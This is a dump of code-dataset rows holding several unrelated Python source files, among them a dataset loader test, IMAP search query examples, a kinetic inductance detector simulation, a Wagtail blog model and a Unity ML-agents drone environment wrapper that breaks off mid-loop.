seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
15130917408 | # %%
from pprint import pprint
from datasets import load_dataset
test_file = "../data/ekonspacing/test_small.txt"
val_file = "../data/ekonspacing/val_small.txt"
train_file = "../data/ekonspacing/train_small.txt"
# %%
dataset = load_dataset(
"ekonspacing.py",
name="small",
data_files={"train": str(train_file), "validation": str(val_file), "test": str(test_file)},
download_mode="force_redownload",
)
print(dataset)
# %%
pprint(dataset["train"][0])
pprint(dataset["test"][0])
# %%
| entelecheia/transformer-datasets | datasets/ekonspacing/ekonspacing_test.py | ekonspacing_test.py | py | 500 | python | en | code | 0 | github-code | 36 |
17079442964 | import logging
from .html import extract_html_text
from .pdf import extract_pdf_text
logger = logging.getLogger(__name__)
def extract_text(file_path: str) -> str:
"""Extract text from any kind of file as long as it's html or pdf"""
try:
if file_path.endswith('.html'):
return extract_html_text(file_path)
if file_path.endswith('.pdf'):
return extract_pdf_text(file_path)
raise ValueError(f'Unknown file type {file_path}')
except Exception as an_exception: # pylint: disable=W0718
logger.warning(f'Failed to extract {file_path}: {an_exception}')
return '' # don't return None or else you can't pipeline this
| amy-langley/tracking-trans-hate-bills | lib/util/misc.py | misc.py | py | 691 | python | en | code | 2 | github-code | 36 |
22926496902 | import cv2
import math
# Source: https://richardpricejones.medium.com/drawing-a-rectangle-with-a-angle-using-opencv-c9284eae3380
# Made slight adjustments to color
def draw_angled_rec(x0, y0, width, height, angle, img, color):
_angle = angle * math.pi / 180.0
b = math.cos(_angle) * 0.5
a = math.sin(_angle) * 0.5
pt0 = (int(x0 - a * height - b * width),
int(y0 + b * height - a * width))
pt1 = (int(x0 + a * height - b * width),
int(y0 - b * height - a * width))
pt2 = (int(2 * x0 - pt0[0]), int(2 * y0 - pt0[1]))
pt3 = (int(2 * x0 - pt1[0]), int(2 * y0 - pt1[1]))
if color == 'green':
cv2.line(img, pt0, pt1, (0, 255, 0), 5)
cv2.line(img, pt1, pt2, (0, 255, 0), 5)
cv2.line(img, pt2, pt3, (0, 255, 0), 5)
cv2.line(img, pt3, pt0, (0, 255, 0), 5)
elif color == 'red':
cv2.line(img, pt0, pt1, (0, 0, 255), 5)
cv2.line(img, pt1, pt2, (0, 0, 255), 5)
cv2.line(img, pt2, pt3, (0, 0, 255), 5)
cv2.line(img, pt3, pt0, (0, 0, 255), 5)
else:
cv2.line(img, pt0, pt1, (255, 0, 255), 5)
cv2.line(img, pt1, pt2, (255, 0, 255), 5)
cv2.line(img, pt2, pt3, (255, 0, 255), 5)
cv2.line(img, pt3, pt0, (255, 0, 255), 5)
img = cv2.imread('minAreaRect_Test.png')
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(img_gray, 150, 255, cv2.THRESH_BINARY)
# detect the contours on the binary image using cv2.CHAIN_APPROX_NONE
contours, hierarchy = cv2.findContours(image=thresh, mode=cv2.RETR_TREE, method=cv2.CHAIN_APPROX_NONE)
slender_rat = 3
min_width = 10
max_width = 120
min_len = 120
first = 1
image_copy = img.copy()
cv2.imwrite('minAreaRect_Test_Result.png',image_copy)
# cv2.drawContours(image=image_copy, contours=contours, contourIdx=-1, color=(0, 255, 0), thickness=2, lineType=cv2.LINE_AA)
# Used to add text on pattern
counter = 0
for cnt in contours:
if counter == 0: # First contour encompasses entire image
counter += 1
continue
heir = hierarchy[0][counter][3] # [next, previous, first child, parent].
if heir == 0:
rect = cv2.minAreaRect(cnt)
x = int(rect[0][0])
y = int(rect[0][1])
w = int(rect[1][0])
h = int(rect[1][1])
theta = int(rect[2])
draw_angled_rec(x, y, w, h, theta, image_copy, 'green')
image_tmp = cv2.putText(img=image_copy, text=str(theta)+'[deg]', org=(x, y), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
image_tmp = cv2.putText(img=image_copy, text='w='+str(w), org=(x, y+100), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
image_tmp = cv2.putText(img=image_copy, text='h='+str(h), org=(x, y+200), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=(0,0,0), thickness=5)
cv2.imwrite('minAreaRect_Test_Result.png',image_copy)
counter += 1 | MatanPazi/opt_fabric_layout | minAreaRect_Test.py | minAreaRect_Test.py | py | 2,974 | python | en | code | 1 | github-code | 36 |
13987393028 | from sys import maxsize as maxint
class Solution:
def minSubArrayLen(self, s, nums):
cs = 0
start = 0
min_len = maxint
for end in range(len(nums)):
cs += nums[end]
while cs >= s and start <= end:
min_len = min(min_len, end - start + 1)
if start == end:
break
cs -= nums[start]
start += 1
return min_len if min_len != maxint else 0
| dariomx/topcoder-srm | leetcode/first-pass/facebook/minimum-size-subarray-sum/Solution.py | Solution.py | py | 485 | python | en | code | 0 | github-code | 36 |
521538009 | #imports
import numpy as np
import matplotlib.pyplot as plt
import scipy.constants as const
from scipy.special import iv as I0
from scipy.special import kv as K0
#Define Global Variables
L_geo = 55.6e-9
Z0 = 50.0
F0_base = 0.95e9 #At lowest Temp
squares= 27223
c_couple = 1.5e-14
TC = 1.5
Delta_0 = (3.5*const.Boltzmann*TC)/2
sigma_n = 6.0e7 # Normal stae conductvity if superconducting film
Thick = 20e-9 # Thickness of superconducting fil
w = 2 * np.pi * F0_base
me = const.m_e
miu_0 = 4*np.pi*10**-7
pi = np.pi
#Main code
def main():
#Define temperature range with step 0.01K
step = 0.1
temp = np.arange(0.2, 0.3 , step)
#Find sigma1 and sigma 2 and Lint
sigma1, sigma2 = find_sigma1_sigma2(sigma_n ,Thick, TC, Delta_0, w, temp)
Lint = find_Lint_square(Thick, w, sigma2) * squares
#Find lk
Lk = find_lk(Thick, w, sigma2)
#Find Res
sigma12Ratio = sigma1/sigma2
Res = Lk*w*sigma12Ratio *squares
#IDC for Lowest Temp (0.2K)
Ltot_lowest = Lint[0] + L_geo
IDC = find_IDC(w, Ltot_lowest, c_couple)
#Find S21
Sweep_points = 20000
BW = 5e6
I_raw = np.zeros((Sweep_points, len(temp)), dtype="float")
Q_raw = np.copy(I_raw)
Phase = np.copy(Q_raw)
S21_Volt = np.copy(I_raw)
for i in range(0, len(Lint)):
Sweep, S21_Volt[:,i], Phase[:,i], I_raw[:,i], Q_raw[:,i],_,_,_,_,_ = Capacitive_Res_Sim(F0_base, c_couple, Z0, L_geo, Lint[i], Res[i], BW, Sweep_points, IDC)
plt.plot(Sweep/1e9, S21_Volt[:,i], label=str("{:.2f}".format(temp[i])))
#Graph labels and title
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True, title="Temperature / K")
plt.xlabel('Frequency / GHz', fontsize=13)
plt.ylabel('Output Amplitude', fontsize=13)
#plt.title("S21 Amplitude For Varying Temperatures")
plt.xlim(0.9490, 0.9505)
plt.locator_params(nbins=6)
plt.savefig("S21 Plot with Resistance")
plt.rcParams['figure.dpi'] = 300
plt.figure()
#Q vs I plots
for i in range(0, len(Lint)):
plt.plot(I_raw[:,i], Q_raw[:,i], linewidth=1,label=str("{:.2f}".format(temp[i])))
#Minimum S21 at lowest temp
S21_Base = min(S21_Volt[:,0])
I_Base = np.zeros(len(temp), dtype="float")
Q_Base = np.copy(I_Base)
#Obtain F0_base and I and Q values for Lowest Temp
for i in range(0, len(S21_Volt[:,0])):
if S21_Base == S21_Volt[i,0]:
F0_Base = Sweep[i]
#Plot I and Q values at F0_Base
for i in range(0, len(temp)):
for j in range(0, len(Sweep)):
if F0_Base == Sweep[j]:
I_Base[i] = I_raw[j,i]
Q_Base[i] = Q_raw[j,i]
plt.plot(I_Base[i], Q_Base[i], markersize=4, marker="x", color='black')
#labels
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True, title="Temperature / K")
plt.xlabel('I / V', fontsize=13)
plt.ylabel('Q / V', fontsize=13)
#plt.title("Q vs I Plot for Varying Temperature")
plt.savefig("Q vs I plot for varying temp")
plt.figure()
#Finding F0 for the different Temperatures
F0 = np.zeros(len(temp))
for i in range(0, len(temp)):
S21_min = min(S21_Volt[:,i])
for j in range(0, len(Sweep)):
if S21_min == S21_Volt[j,i]:
F0[i] = Sweep[j]
#Plotting F0 vs Temp
plt.plot(temp, F0/1e9, color='k', linewidth="1", label="Minimum Of S21")
plt.xlabel('Temperature / K', fontsize=13)
plt.ylabel('F0 / GHz', fontsize=13)
plt.rcParams['figure.dpi'] = 300
#plt.title("F0 vs Temperature")
#Finding dI/dF and dQ/dF for lowest temperature
#Using numerical derivatives
step = abs((Sweep[0]-Sweep[-1])/Sweep_points)
for i in range(0, len(Sweep)):
if Sweep[i] == F0_Base:
didf = (I_raw[i+1,0] - I_raw[i-1,0])/(2*step)
dqdf = (Q_raw[i+1,0] - Q_raw[i-1,0])/(2*step)
#Use Magic Formula
di = np.zeros(len(temp))
dq = np.copy(di)
di = abs(I_Base - I_Base[0])
dq = abs(Q_Base - Q_Base[0])
dF0 = Magic_Formula(di, dq, didf, dqdf)
#Find F0 for different temp
F0_Magic = F0_Base - abs(dF0)
plt.plot(temp, F0_Magic/1e9, label="dF0 Formula")
plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), fancybox=True)
plt.ticklabel_format(useOffset=False)
plt.rcParams['figure.dpi'] = 1000
plt.xlim(0.20, 0.22)
plt.ylim(0.949980, 0.95)
plt.savefig("Magic Formula plot")
#KID Simulating Function
def Capacitive_Res_Sim(F0, C_couple, Z0, L_geo, L_int, Res, Sweep_BW, Sweep_points, Capacitance):
""" Help file here"""
j=complex(0,1)
Cc=C_couple
F_min=F0-(Sweep_BW/2.0)
F_max=F0+(Sweep_BW/2.0)
Sweep=np.linspace(F_min, F_max, Sweep_points)
W=Sweep*2.0*pi
W0=2.0*pi*F0
L=L_geo+L_int
C=Capacitance
Zres= 1.0/((1./((j*W*L)+Res))+(j*W*C)) # Impedance of resonator section
Zc=1.0/(j*W*Cc) #impedance of coupler
ZT=Zres+Zc
YT=1.0/ZT
S21 = 2.0/(2.0+(YT*Z0))
I_raw=S21.real
Q_raw=S21.imag
shift=((1.0-min(I_raw))/2.0)+min(I_raw)
I_cent=I_raw-shift
Q_cent=Q_raw
Phase=Atan(abs(Q_cent/I_cent))
QU=(W0*L)/Res
QL=(C*2)/(W0*(Cc**2)*Z0)
S21_Volt=abs(S21)
I_offset=shift
return (Sweep, S21_Volt, Phase, I_raw, Q_raw, I_cent, Q_cent, QU, QL, I_offset)
#Function to find sigma1 and sigma2
def find_sigma1_sigma2(sigma_n ,Thick, TC, Delta_0, w, T):
#An interpolation formula for delta_T
delta_T = Delta_0*np.tanh(1.74*np.sqrt((TC/T)-1))
#Define constants to simplify eqn
multiplying_constant = delta_T/(const.hbar * w)
e_const_1 = - Delta_0/(const.Boltzmann*T)
e_const_2 = (const.hbar*w)/(2*const.Boltzmann*T)
#Parts of the sigma1 Ratio
A = 2*multiplying_constant
B = np.exp(e_const_1)
C = K0(0, e_const_2)
D = 2*(np.sinh(e_const_2))
#Find Sigma 1 and Sigma 2
sigma1Ratio = A * B * C * D
sigma2Ratio = np.pi*multiplying_constant*(1 - (2*np.exp(e_const_1)*np.exp(-e_const_2)*I0(0,e_const_2)))
sigma2 = sigma2Ratio * sigma_n
sigma1 = sigma1Ratio * sigma_n
return sigma1, sigma2
def find_lk(Thick, w, sigma2):
#Depth
lower_fraction = miu_0*sigma2*w
Lambda_T_MB = (1/lower_fraction)**0.5
fraction = Thick/(2*Lambda_T_MB)
#Terms for lk
A = (miu_0*Lambda_T_MB)/4
B = coth(fraction)
C = fraction*(csch(fraction))**2
#R vs T
lk = A*(B+C)
return lk
def find_Lint_square(Thick, w, sigma2):
#Depth
lower_fraction = miu_0*sigma2*w
Lambda_T_MB = (1/lower_fraction)**0.5
#Internal Inductance
fraction = Thick/(2*Lambda_T_MB)
L_int = (miu_0*Lambda_T_MB/2)*coth(fraction)
return L_int
#Define coth and csch
def coth(x):
return np.cosh(x)/np.sinh(x)
def csch(x):
return 1/np.sinh(x)
def Atan(x):
return np.arctan(x)
#Find IDC function
def find_IDC(w0, Ltot, Cc):
IDC = 1/((w0**2)*Ltot) - Cc
return IDC
def Magic_Formula(di, dq, didf, dqdf):
return (di*didf + dq*dqdf)/(didf**2 + dqdf**2)
main() | Ashleyyyt/Characterizing-KIDs | Simulate KID.py | Simulate KID.py | py | 7,177 | python | en | code | 0 | github-code | 36 |
29290663147 | from django.db import models
from wagtail.admin.edit_handlers import MultiFieldPanel, RichTextFieldPanel, StreamFieldPanel
from wagtail.core.fields import RichTextField, StreamField
from wagtail.snippets.models import register_snippet
from ..modules import text_processing
from .. import configurations
from ..blogs.blocks import SectionBlock
@register_snippet
class BlogPost(models.Model):
post_title = RichTextField(
features=[], blank=False, null=True,
)
post_summary = RichTextField(
features=configurations.RICHTEXT_FEATURES, blank=False, null=True,
)
post_introduction = RichTextField(
features=configurations.RICHTEXT_FEATURES, blank=True, null=True,
)
post_conclusion = RichTextField(
features=configurations.RICHTEXT_FEATURES, blank=True, null=True,
)
sections = StreamField(
[
('section', SectionBlock()),
], blank=False
)
panels = [
MultiFieldPanel(
[
RichTextFieldPanel('post_title'),
RichTextFieldPanel('post_summary'),
RichTextFieldPanel('post_introduction'),
StreamFieldPanel('sections'),
RichTextFieldPanel('post_conclusion'),
], heading='Post Content'
),
]
@property
def sections_with_title(self):
sections = []
for section in self.sections:
if section.value['title']:
sections.append(section)
return sections
def __str__(self):
return text_processing.html_to_str(
self.post_title
)
| VahediRepositories/AllDota | dotahub/home/blogs/models.py | models.py | py | 1,626 | python | en | code | 0 | github-code | 36 |
7182836122 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: José Sánchez-Gallego (gallegoj@uw.edu)
# @Date: 2023-01-19
# @Filename: test_callback.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
import unittest.mock
import click
from click.testing import CliRunner
from unclick.core import build_command_string
@click.command()
@click.argument("ARG1", type=str)
@click.argument("ARG2", type=int, required=False)
@click.option("--flag1", "-f", is_flag=True, help="A flag.")
def my_command1(*args, **kwrgs):
"""Test command."""
return
def _command_invoke(command: click.Command, string: str):
"""Checks that command is called and returns a mock of the callback."""
with unittest.mock.patch.object(command, "callback") as mock_callback:
runner = CliRunner()
result = runner.invoke(command, string[len(command.name or "") :])
assert result.exit_code == 0
mock_callback.assert_called()
return mock_callback
def test_callback():
command_string = build_command_string(my_command1, "hi", 2, flag1=True)
mock_callback = _command_invoke(my_command1, command_string)
mock_callback.assert_called_once_with(arg1="hi", arg2=2, flag1=True)
def test_callback2():
command_string = build_command_string(my_command1, "hi")
mock_callback = _command_invoke(my_command1, command_string)
mock_callback.assert_called_once_with(arg1="hi", arg2=None, flag1=False)
def test_callback_string_with_spaces():
command_string = build_command_string(my_command1, "hi how are you")
mock_callback = _command_invoke(my_command1, command_string)
mock_callback.assert_called_once_with(arg1="hi how are you", arg2=None, flag1=False)
| albireox/unclick | tests/test_callback.py | test_callback.py | py | 1,732 | python | en | code | 0 | github-code | 36 |
22502725218 | # -*- coding: utf-8 -*-
__docformat__ = "restructuredtext en"
"""
the PLUGIN extend
File: app_plugin_ext.py
Copyright: Blink AG
Author: Steffen Kube <steffen@blink-dx.com>
"""
from blinkdms.code.lib.oTASK import oTASK
from blinkdms.code.lib.main_imports import *
from blinkdms.code.lib.obj import table_obj_chk
class gPlugin_ext:
def __init__(self, _html, infoarr, mod_is_adm_space):
self._html = _html
self.infoarr = infoarr
self._mod_is_adm_space = mod_is_adm_space
def html_left(self, db_obj):
'''
left HTML frame update history ...
'''
# TBD: later ...
#objhist_lib = objhist()
#objects = objhist_lib.get_objects_sort(db_obj)
#self._html.add_meta('objhist', objects)
# if len(objects):
# self._html.add_meta( 'objhist_i', session['sessvars'].get('objhist_i',{}) )
pass
def task_info(self, db_obj):
'''
left HTML frame update history ...
'''
if not session.get('loggedin', 0):
return
task_lib = oTASK.UserTask(session['sesssec']['user_id'])
num = task_lib.getNumOpenTasks(db_obj)
self._html.add_meta('task.num', num)
def post_actions(self, db_obj):
# self.html_left(db_obj)
self.task_info(db_obj)
def set_object(self, tablename, objid):
self.tablename = tablename
self.objid = objid
def sec_check_obj(self, db_obj):
'''
do TABLE and OBJECT access checks ..
'''
if not self._mod_is_adm_space: # if not in the ADMIN-Area
return
tablename = self.tablename
# tablib = table_cls(tablename)
# if GlobMethods.is_admin():
# pass
# if tablib.is_bo() :
# self.infoarr['table.icon.show'] = 1
# return
# throws errors
act = {
'tab': ['read'],
'obj': ['read']
}
if len(self.infoarr.get('objtab.acc_check', {})):
act = self.infoarr['objtab.acc_check']
table_obj_chk.do_tab_obj_access_chk(db_obj, tablename, self.objid, act)
| qbicode/blinkdms | blinkdms/code/lib/app_plugin_ext.py | app_plugin_ext.py | py | 2,218 | python | en | code | 0 | github-code | 36 |
27549684390 | """
Query builder examples.
NOTES:
# Infix notation (natural to humans)
NOT ((FROM='11' OR TO="22" OR TEXT="33") AND CC="44" AND BCC="55")
# Prefix notation (Polish notation, IMAP version)
NOT (((OR OR FROM "11" TO "22" TEXT "33") CC "44" BCC "55"))
# Python query builder
NOT(AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55'))
# python to prefix notation steps:
1. OR(1=11, 2=22, 3=33) ->
"(OR OR FROM "11" TO "22" TEXT "33")"
2. AND("(OR OR FROM "11" TO "22" TEXT "33")", cc='44', bcc='55') ->
"AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55')"
3. NOT("AND(OR(from_='11', to='22', text='33'), cc='44', bcc='55')") ->
"NOT (((OR OR FROM "1" TO "22" TEXT "33") CC "44" BCC "55"))"
"""
import datetime as dt
from imap_tools import AND, OR, NOT, A, H, U
# date in the date list (date=date1 OR date=date3 OR date=date2)
q1 = OR(date=[dt.date(2019, 10, 1), dt.date(2019, 10, 10), dt.date(2019, 10, 15)])
# '(OR OR ON 1-Oct-2019 ON 10-Oct-2019 ON 15-Oct-2019)'
# date not in the date list (NOT(date=date1 OR date=date3 OR date=date2))
q2 = NOT(OR(date=[dt.date(2019, 10, 1), dt.date(2019, 10, 10), dt.date(2019, 10, 15)]))
# 'NOT ((OR OR ON 1-Oct-2019 ON 10-Oct-2019 ON 15-Oct-2019))'
# subject contains "hello" AND date greater than or equal dt.date(2019, 10, 10)
q3 = A(subject='hello', date_gte=dt.date(2019, 10, 10))
# '(SUBJECT "hello" SINCE 10-Oct-2019)'
# from contains one of the address parts
q4 = OR(from_=["@spam.ru", "@tricky-spam.ru"])
# '(OR FROM "@spam.ru" FROM "@tricky-spam.ru")'
# marked as seen and not flagged
q5 = AND(seen=True, flagged=False)
# '(SEEN UNFLAGGED)'
# (text contains tag15 AND subject contains tag15) OR (text contains tag10 AND subject contains tag10)
q6 = OR(AND(text='tag15', subject='tag15'), AND(text='tag10', subject='tag10'))
# '(OR (TEXT "tag15" SUBJECT "tag15") (TEXT "tag10" SUBJECT "tag10"))'
# (text contains tag15 OR subject contains tag15) OR (text contains tag10 OR subject contains tag10)
q7 = OR(OR(text='tag15', subject='tag15'), OR(text='tag10', subject='tag10'))
# '(OR (OR TEXT "tag15" SUBJECT "tag15") (OR TEXT "tag10" SUBJECT "tag10"))'
# header IsSpam contains '++' AND header CheckAntivirus contains '-'
q8 = A(header=[H('IsSpam', '++'), H('CheckAntivirus', '-')])
# '(HEADER "IsSpam" "++" HEADER "CheckAntivirus" "-")'
# UID range
q9 = A(uid=U('1034', '*'))
# '(UID 1034:*)'
# complex from README
q10 = A(OR(from_='from@ya.ru', text='"the text"'), NOT(OR(A(answered=False), A(new=True))), to='to@ya.ru')
# '((OR FROM "from@ya.ru" TEXT "\\"the text\\"") NOT ((OR (UNANSWERED) (NEW))) TO "to@ya.ru")'
| ikvk/imap_tools | examples/search.py | search.py | py | 2,613 | python | en | code | 608 | github-code | 36 |
17232377687 | import numpy as np
import json
import CMS_lumi
import os
import copy
import ROOT
def main():
#work_dir = "."
#plots_dir = "."
ROOT.gROOT.SetBatch()
ROOT.gStyle.SetOptStat(0000)
ROOT.gStyle.SetPalette(ROOT.kVisibleSpectrum)
file_obs = ROOT.TFile("higgsCombineTest.GoodnessOfFit.mH100.root","READ")
file_toys = ROOT.TFile("higgsCombineTest.GoodnessOfFit.mH100.Toys.root","READ")
limit_obs = np.zeros((1), dtype="float64")
limit_toys = np.zeros((1), dtype="float64")
m_h = np.zeros((1), dtype="float64")
########### Data #################
tree_obs = file_obs.Get("limit")
tree_obs.SetBranchAddress("limit",limit_obs)
tree_obs.SetBranchAddress("mh",m_h)
tree_obs.GetEntry(0)
########### Toys #################
tree_toys = file_toys.Get("limit")
tree_toys.SetBranchAddress("limit",limit_toys)
#Histo =ROOT.TH1D("Histo","",40,(0.85)*tree_toys.GetMinimum("limit"),(0.95)*tree_toys.GetMaximum("limit"))
Histo =ROOT.TH1D("Histo","",40,40,180)
for iEvent in range(tree_toys.GetEntries()):
tree_toys.GetEntry(iEvent)
Histo.Fill(limit_toys,1.)
Histo.Scale(1/Histo.Integral())
bin_obs = Histo.GetXaxis().FindBin(limit_obs)
p_value = Histo.Integral(bin_obs,Histo.GetNbinsX())
print("p-value: " + str(p_value))
canvas = ROOT.TCanvas("canvas","canvas",900,900)
canvas.cd()
canvas.SetTicks()
canvas.SetLeftMargin(0.15)
canvas.SetRightMargin(0.05)
canvas.SetBottomMargin(0.13)
Histo.GetYaxis().SetRangeUser(0.,1.6*Histo.GetMaximum())
Histo.SetLineColor(ROOT.kSpring-8)
Histo.SetLineWidth(1)
Histo.SetLineStyle(1)
Histo.SetFillColorAlpha(ROOT.kSpring-8,0.20)
Histo.SetFillStyle(1001)
Histo.GetYaxis().SetTitleOffset(1.5)
Histo.GetYaxis().SetTitle("Normalized to unity")
Histo.GetYaxis().SetTitleSize(0.038)
Histo.GetYaxis().SetLabelSize(0.032)
Histo.GetYaxis().SetTickLength(0.03)
Histo.GetXaxis().SetLabelFont(42)
Histo.GetXaxis().SetLabelSize(0.032)
Histo.GetXaxis().SetTitleSize(0.038)
Histo.GetXaxis().SetTitleOffset(1.3)
Histo.GetXaxis().SetTitle("-2 ln #lambda (saturated)")
Histo.GetXaxis().SetTickLength(0.03)
Histo_PValue = Histo.Clone("Histo_PValue")
Histo_PValue.SetLineColor(ROOT.kRed)
Histo_PValue.SetLineWidth(0)
Histo_PValue.SetFillColorAlpha(ROOT.kRed,0.40)
arrow = ROOT.TArrow(Histo.GetBinLowEdge(bin_obs),0.002,Histo.GetBinLowEdge(bin_obs),0.4*Histo.GetBinContent(bin_obs),0.02,"<|")
arrow.SetAngle(50)
arrow.SetLineWidth(3)
arrow.SetLineColor(ROOT.kRed)
arrow.SetFillColorAlpha(ROOT.kRed,0.45)
for iBin in range(Histo_PValue.GetXaxis().FindBin(limit_obs)):
Histo_PValue.SetBinContent(iBin,0.)
Histo.Draw("h")
Histo_PValue.Draw("sameh")
arrow.Draw()
leg = ROOT.TLegend(0.55,0.55,0.9,0.75)
leg.SetTextSize(0.035)
leg.SetBorderSize(0)
leg.AddEntry(arrow,"Observed","l")
leg.AddEntry(Histo,"Expected (Toys)","lf")
leg.Draw()
Latex = ROOT.TLatex()
Latex.SetNDC()
Latex.SetTextColor(ROOT.kGray+2)
Latex.SetTextSize(0.04)
Latex.SetTextFont(12)
Latex.DrawLatex(1-canvas.GetRightMargin()-0.75,1-canvas.GetTopMargin()-0.1,"Sig+Bkgd")
Latex.DrawLatex(1-canvas.GetRightMargin()-0.75,1-canvas.GetTopMargin()-0.15,"p-value: " + str(round(p_value,3)))
Latex.DrawLatex(canvas.GetLeftMargin()+0.01,1+0.02-canvas.GetTopMargin(),'#color[4]{SL}')
CMS_lumi.CMS_lumi(canvas, 15, 3)
canvas.Update()
canvas.Print("GoF.pdf","Portrait pdf")
if __name__ == "__main__":
main()
| vshang/Limits | plot_gof.py | plot_gof.py | py | 3,697 | python | en | code | 0 | github-code | 36 |
15857685473 | # -*- coding: utf-8 -*-
import os
import sys
import webbrowser
from invoke import task
docs_dir = 'docs'
build_dir = os.path.join(docs_dir, '_build')
@task
def readme(ctx, browse=False):
ctx.run("rst2html.py README.rst > README.html")
if browse:
webbrowser.open_new_tab('README.html')
def build_docs(ctx, browse):
ctx.run("sphinx-build %s %s" % (docs_dir, build_dir), echo=True)
if browse:
browse_docs(ctx)
@task
def clean_docs(ctx):
ctx.run('rm -rf %s' % build_dir)
@task
def browse_docs(ctx):
path = os.path.join(build_dir, 'index.html')
webbrowser.open_new_tab(path)
@task
def docs(ctx, clean=False, browse=False, watch=False):
"""Build the docs."""
if clean:
clean_docs(ctx)
if watch:
watch_docs(ctx, browse=browse)
else:
build_docs(ctx, browse=browse)
@task
def watch_docs(ctx, browse=False, port=1234):
"""Run build the docs when a file changes."""
try:
import sphinx_autobuild # noqa
except ImportError:
print('ERROR: watch task requires the sphinx_autobuild package.')
print('Install it with:')
print(' pip install sphinx-autobuild')
sys.exit(1)
ctx.run('sphinx-autobuild {0} --port={port} {1} {2}'.format(
'--open-browser' if browse else '', docs_dir, build_dir, port=port),
echo=True, pty=True)
| CenterForOpenScience/COSDev | tasks.py | tasks.py | py | 1,383 | python | en | code | 6 | github-code | 36 |
6942705198 | '''
Complete the following 3 searching problems using techniques
from class and from Ch15 of the textbook website
'''
#1. (7pts) Write code which finds and prints the longest
# word in the provided dictionary. If there are more
# than one longest word, print them all.
import re
def split_line(line):
#this function takes in a line of text and returns
#a list of words in the line
return re.findall('[A-Za-z]+(?:\'[A-Za-z]+)?', line)
file = open("dictionary.txt")
longest = [" "]
for line in file:
words = split_line(line)
for word in words:
if len(word.upper()) > len(longest[0]):
longest = [word]
elif len(word) == len(longest[0]):
longest.append(word)
print(longest)
file.close()
#2. (10pts) Write code which finds
# The total word count AND average word length
# in "AliceInWonderLand.txt"
file = open("AliceInWonderLand.txt")
word_count = 0
average = 0
for line in file:
words = split_line(line)
for word in words:
word_count += 1
average += len(word)
average /= word_count
print("There are", word_count, "words in Alice in Wonderland")
print("The average word length is:", average)
file.close()
# CHOOSE ONE OF THE FOLLOWING TWO PROBLEMS
#3 (13pts) How many times does "Cheshire" occur in "AliceInWonderLand.txt"?
# How many times does "Cat" occur?
cheshire = 0
cat = 0
file = open("AliceInWonderLand.txt")
for line in file:
words = split_line(line)
for word in words:
if word.upper() == "CHESHIRE":
cheshire += 1
elif word.upper() == "CAT":
cat += 1
print("Cheshire is said", cheshire, "times.")
print("Cat is said", cat, "times.")
file.close()
# How many times does "Cheshire" immediately followed by "Cat" occur?
combo = 0
previous = ""
current = ""
file = open("AliceInWonderLand.txt")
for line in file:
words = split_line(line)
for word in words:
current = word
if previous.upper() == "CHESHIRE" and current.upper() == "CAT":
combo += 1
previous = current
print("Cheshire cat is said", combo, "Times")
file.close()
#### OR #####
#3 (13pts)Find the most frequently occurring
# seven letter word in "AliceInWonderLand.txt"
# Challenge problem (for fun). What words appear in the text of "Alice in Wonderland" that DO NOT occur in "Alice Through the Looking Glass". Make a list. You can substitute this for any of the above problems.
| ParkerCS/ch15-searches-sdemirjian | ch15ProblemSet.py | ch15ProblemSet.py | py | 2,450 | python | en | code | 0 | github-code | 36 |
9866560419 | from mlagents_envs.environment import UnityEnvironment
from mlagents_envs.environment import ActionTuple
from mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel
import numpy as np
import mlagents.trainers
from collections import namedtuple
obs = namedtuple(
'obs',
['vector', 'front', 'right', 'back', 'left', 'raycast'])
class Drone(object):
def __init__(self, time_scale=1.0, filename='mac.app', port=11000):
self.engine_configuration_channel = EngineConfigurationChannel()
print(f"VERSION : {mlagents.trainers.__version__}")
self.env = UnityEnvironment(
file_name=filename,
worker_id=port,
side_channels=[self.engine_configuration_channel])
self.env.reset()
self.behavior_name = list(self.env.behavior_specs.keys())[0]
self.spec = self.env.behavior_specs[self.behavior_name]
self.engine_configuration_channel.set_configuration_parameters(time_scale=time_scale)
self.dec, self.term = self.env.get_steps(self.behavior_name)
def reset(self):
self.env.reset()
self.dec, self.term = self.env.get_steps(self.behavior_name)
self.tracked_agent = -1
self.state = [self.dec.obs[i][0] for i in range(6)]
self.state = obs(
vector=self.state[0], front=self.state[1],
right=self.state[2], back=self.state[3],
left=self.state[4], raycast=self.state[5])
return self.state
def step(self, action):
if self.tracked_agent == -1 and len(self.dec) >= 1:
self.tracked_agent = self.dec.agent_id[0]
action = np.clip(action, -1, 1)
action_tuple = ActionTuple()
action_tuple.add_continuous(np.array([action]))
self.env.set_actions(self.behavior_name, action_tuple)
self.env.step()
self.dec, self.term = self.env.get_steps(self.behavior_name)
reward = 0
done = False
if self.tracked_agent in self.dec:
reward += self.dec[self.tracked_agent].reward
if self.tracked_agent in self.term:
reward += self.term[self.tracked_agent].reward
done = True
if done:
return self.state, reward, done
self.state = [self.dec.obs[i][0] for i in range(6)]
self.state = obs(
vector=self.state[0], front=self.state[1],
right=self.state[2], back=self.state[3],
left=self.state[4], raycast=self.state[5])
return self.state, reward, done
if __name__ == '__main__':
import matplotlib.pyplot as plt
env = Drone(
time_scale=0.1,
filename='/Users/chageumgang/Desktop/baselines/mac.app')
episode = 0
while True:
state = env.reset()
done = False
score = 0
episode += 1
while not done:
action = np.random.rand(3)
next_state, reward, done = env.step(action)
score += reward
print(next_state.vector.shape)
print(next_state.raycast.shape)
print(next_state.front.shape)
'''
